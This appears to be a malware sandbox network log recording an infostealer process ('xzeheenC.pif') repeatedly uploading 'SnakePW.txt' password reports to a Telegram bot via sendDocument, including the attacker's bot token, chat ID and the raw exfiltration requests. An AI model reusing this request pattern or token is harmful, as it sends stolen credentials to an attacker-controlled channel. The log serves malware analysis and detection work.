2024-12-18 15:32:01 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419172,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535920,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.8 | 49831 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:01 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd218eab45cc14
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:01 UTC | 535 | OUT | Data Ascii: --------------------------8dd218eab45cc14Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:01 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:01 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:01 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419174,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535921,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.8 | 49832 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:01 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd210b4912642d
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
2024-12-18 15:32:01 UTC | 535 | OUT | Data Ascii: --------------------------8dd210b4912642dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:02 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:02 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:02 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419176,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535922,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.8 | 49837 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:02 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd223310119778
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:02 UTC | 535 | OUT | Data Ascii: --------------------------8dd223310119778Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:03 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:02 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:03 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419178,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535922,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.8 | 49839 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:03 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21b2badf5d23
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:03 UTC | 535 | OUT | Data Ascii: --------------------------8dd21b2badf5d23Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:03 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:03 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:03 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419180,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535923,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.8 | 49840 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:03 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21254f48c305
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:03 UTC | 535 | OUT | Data Ascii: --------------------------8dd21254f48c305Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:04 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:04 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:04 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419182,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535924,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.8 | 49845 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:04 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd225771662831
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:04 UTC | 535 | OUT | Data Ascii: --------------------------8dd225771662831Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:04 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:04 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:04 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419184,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535924,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.8 | 49847 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:05 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21d6aa07b8e0
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:05 UTC | 535 | OUT | Data Ascii: --------------------------8dd21d6aa07b8e0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:05 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:05 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:05 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419186,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535925,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.8 | 49848 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:05 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd213f3d4bedcb
Host: api.telegram.org
Content-Length: 535
Connection: Keep-Alive
2024-12-18 15:32:05 UTC | 535 | OUT | Data Ascii: --------------------------8dd213f3d4bedcbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:06 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:06 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:06 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419188,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535926,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.8 | 49849 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:06 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2281f045fe39
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:06 UTC | 535 | OUT | Data Ascii: --------------------------8dd2281f045fe39Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:06 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:06 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:06 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419190,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535926,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.8 | 49855 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:07 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21fd08727360
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:07 UTC | 535 | OUT | Data Ascii: --------------------------8dd21fd08727360Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:07 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:07 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:07 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419192,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535927,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.8 | 49856 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:07 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd215a5df1d419
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:07 UTC | 535 | OUT | Data Ascii: --------------------------8dd215a5df1d419Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:08 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:08 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:08 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419194,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535928,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        89 | 192.168.2.8 | 49857 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:32:08 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd22b505293680
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Data Ascii: --------------------------8dd22b505293680Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:08 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:08 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419196,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535928,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        90 | 192.168.2.8 | 49862 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:32:09 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd222ae7dea767
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Data Ascii: --------------------------8dd222ae7dea767Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:09 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:09 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419198,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535929,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        91 | 192.168.2.8 | 49864 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:32:09 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2177fa1de5ca
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        Data Ascii: --------------------------8dd2177fa1de5caContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:10 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:10 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419200,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535930,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        92 | 192.168.2.8 | 49865 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:32:10 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd22e92e63468f
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Data Ascii: --------------------------8dd22e92e63468fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:10 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:10 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419202,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535930,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        93 | 192.168.2.8 | 49870 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:32:11 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd225621140a82
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Data Ascii: --------------------------8dd225621140a82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:11 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:11 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419204,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535931,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        94 | 192.168.2.8 | 49872 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:32:11 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21957fa780dd
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Data Ascii: --------------------------8dd21957fa780ddContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:12 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:12 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
